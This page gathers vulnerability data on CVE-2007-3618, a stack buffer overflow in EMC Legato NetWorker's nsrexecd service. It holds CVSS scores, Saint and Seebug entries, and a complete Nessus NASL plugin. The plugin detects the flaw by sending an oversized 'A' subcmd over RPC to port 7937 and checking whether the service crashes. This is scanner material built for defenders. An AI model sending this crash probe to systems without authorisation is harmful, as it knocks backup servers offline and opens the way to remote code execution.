CVE-2007-3618 - Remote Exec Service Stack Buffer Overflow vulnerability in EMC Legato Networker

CVSS 9.3 - CRITICAL
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE

Summary

Stack-based buffer overflow in the NetWorker Remote Exec Service (nsrexecd.exe) in EMC Software NetWorker 7.x.x allows remote attackers to execute arbitrary code via a (1) poll or (2) kill request with a "long invalid subcmd."

Nessus

NASL family: Gain a shell remotely
NASL id: EMC_NETWORKER_CVE-2007-3618.NASL
description: The EMC Legato Networker application running on the remote host is affected by a stack overflow condition in the Networker Remote Exec Service (nsrexecd.exe), specifically within the sprintf() function, when handling poll or kill requests. An unauthenticated, remote attacker can exploit this, via a crafted request using a long invalid subcmd, to execute arbitrary code.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 94163
published: 2016-10-20
reporter: This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/94163
title: EMC Legato Networker Remote Exec Service Stack Overflow RCE
code
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");

if(description)
{
  # Registration pass: when Nessus loads the plugin with `description`
  # set, only the metadata below is registered and the script exits
  # before any network activity takes place.
  script_id(94163);
  script_version("1.6");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_cve_id("CVE-2007-3618");
  script_bugtraq_id(25375);
  script_xref(name:"ZDI", value:"ZDI-07-049");
  script_xref(name:"TRA", value:"TRA-2007-06");

  script_name(english:"EMC Legato Networker Remote Exec Service Stack Overflow RCE");
  # This is a crash test, not a version check: a positive result means
  # the probe actually terminated nsrexecd on the target.
  script_summary(english:"Attempts to terminate the nsrexecd process.");
 
  script_set_attribute(attribute:"synopsis", value:
"A backup application running on the remote host is affected by a
remote code execution vulnerability.");
 script_set_attribute(attribute:"description", value:
"The EMC Legato Networker application running on the remote host is
affected by a stack overflow condition in the Networker Remote Exec
Service (nsrexecd.exe), specifically within the sprintf() function,
when handling poll or kill requests. An unauthenticated, remote
attacker can exploit this, via a crafted request using a long invalid
subcmd, to execute arbitrary code.");
  script_set_attribute(attribute:"solution", value:
"Contact the vendor for an update as referenced in knowledge base
article esg83899.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  # NOTE(review): the CVSS3 base vector scores Integrity as N, while the
  # description and the CVSS2 vector (C:C/I:C/A:C) describe arbitrary
  # code execution; the two look inconsistent -- confirm against the
  # source advisory before relying on the CVSS3 score.
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-07-049/");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/08/20");
  script_set_attribute(attribute:"patch_publication_date", value:"2007/08/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:emc:networker");
  script_end_attributes();

  # ACT_DENIAL: the check is expected to disrupt the target service
  # (it detects the flaw by crashing nsrexecd). In Nessus such plugins
  # are normally gated by the scan policy's safe-checks setting -- verify
  # before enabling against production backup servers.
  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.");

  # Requires the detection plugin to have populated the KB key, and the
  # fixed nsrexecd port to be open, before this check is scheduled.
  script_dependencies("legato_detect.nasl");
  script_require_keys("LegatoNetworker/installed");
  script_require_ports(7937); 

  exit(0);
}

include("audit.inc");
include("misc_func.inc");
include("global_settings.inc");
include("sunrpc_func.inc");
include("dump.inc");

# Check if Networker is running 
# Bail out unless the detection plugin (legato_detect.nasl) has recorded
# an installation in the KB; otherwise a negative result is meaningless.
if(! get_kb_item("LegatoNetworker/installed"))
  audit(AUDIT_NOT_INST, "The EMC Legato Networker");

# EMC Networker Security Configuration Guide says
# fixed port 7937 is used for nsrexecd
port = 7937;
soc = open_sock_tcp (port);
if (!soc) audit(AUDIT_SOCK_FAIL, port); 

# Random RPC transaction id; reused for the packet header below.
xid = rand();

# Overflow 0x100-byte stack buffer 
# 0x200 bytes of 'A' as the subcmd value. On an unpatched service this
# is expected to crash nsrexecd (the plugin is ACT_DENIAL), so the test
# is destructive by design; a fixed build is expected to reject it with
# an "invalid subcmd" reply instead.
attack = crap(data:"A", length:0x200);

# Request body as an XDR-encoded attribute list. Per attribute: name
# string, then a 1 followed by each value string, then 0 to end the
# value list; a leading 1 introduces the next attribute and a final 0
# ends the list.
data = 
  xdr_long(xid) +                    # leading XDR long carrying the xid; its role in the body is not documented here
  xdr_string("sn_sub_rqst") +        # attr name
  xdr_long(1) +                      # 1 = attr value follows
  xdr_string(attack) +               # first item in attr value list
  xdr_long(0) +                      # 0 = no more value items; 

  xdr_long(1) +                      # 1 = attr follows
  xdr_string("sn_cmd_str") +         # attr name
  xdr_long(1) +                      # 1 =  attr value follows 
  xdr_string("sn_cmd_str_value") +   # first item in attr value list 
  xdr_long(0) +                      # 0 = no more value items

  xdr_long(1) +                      # 1 = attr follows
  xdr_string("sn_timestamp") +       # attr name
  xdr_long(1) +                      # 1 =  attr value follows 
  xdr_string(string(unixtime())) +   # first item in attr value list 
  xdr_long(0) +                      # 0 = no more value items

  xdr_long(0);                       # 0 = no more attr        
      
# Wrap the body in an ONC RPC call: program 0x5f3e1, version 1,
# procedure 5 (values as used by this plugin; presumably the nsrexecd
# program number and its poll/kill procedure -- not verifiable here).
pkt = rpc_packet(xid: xid, prog:0x5f3e1, proc:5, vers: 1, data: data);

send(socket: soc, data: pkt);
res = rpc_recv(socket: soc);
if(res) 
{
  # A fixed build replies with an "invalid subcmd" error that echoes the
  # start of the supplied value. Only the first 16 bytes of the payload
  # are matched, presumably because the fixed build truncates the echoed
  # subcmd -- inferred from this check, not confirmed.
  if("dpoll: invalid subcmd " + substr(attack, 0, 15) >< res)
  {
    audit(AUDIT_HOST_NOT, "affected");
  }
  else
  {
    # Any other reply is reported as unexpected (with a hex dump) rather
    # than being treated as vulnerable or not.
    audit(AUDIT_RESP_BAD, port, 'a nsrexecd RPC call. Reply:\n' + hexdump(ddata:res)); 
  }
}
# No response: nsrexecd likely terminated
else
{
  # Silence alone is not enough: the service must also be confirmed dead
  # before reporting. NOTE(review): a recv timeout on a slow host followed
  # by a transient connection failure in service_is_dead() would still
  # read as a positive -- confirm service_is_dead() semantics if false
  # positives are observed.
  if(service_is_dead(port: port))
  {
    security_report_v4(port:port, severity: SECURITY_HOLE);
  }
  else
  {
    exit(1, "Unexpected: nsrexecd should terminate but did not."); 
  }
}

Saint

bid: 25375
description: EMC NetWorker Remote Exec service subcmd buffer overflow
idrpc_legatocategory_remoteexecbo,rpc_legatocategory_version
osvdb: 39744
title: emc_networker_rexec_subcmd
type: remote

Seebug

bulletinFamily: exploit
description: BUGTRAQ ID: 25375 CVE(CAN) ID: CVE-2007-3618 EMC Legato NetWorker是一款跨平台的备份和恢复系统。 EMC Legato NetWorker的远程Exec服务(nsrexecd.exe)存在栈溢出漏洞,远程攻击者可能利用此漏洞控制服务器。 如果向poll或kill请求提交了超长的无效subcmd请求的话,就可以在对sprintf()的调用中触发这个溢出,导致执行任意指令。 EMC Legato Networker 7.x.x 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.emc.com/products/storage_management/navisphere.jsp
id: SSV:2149
last seen: 2017-11-19
modified: 2007-08-21
published: 2007-08-21
reporter: Root
title: EMC Legato Networker nsrexecd.exe服务远程栈溢出漏洞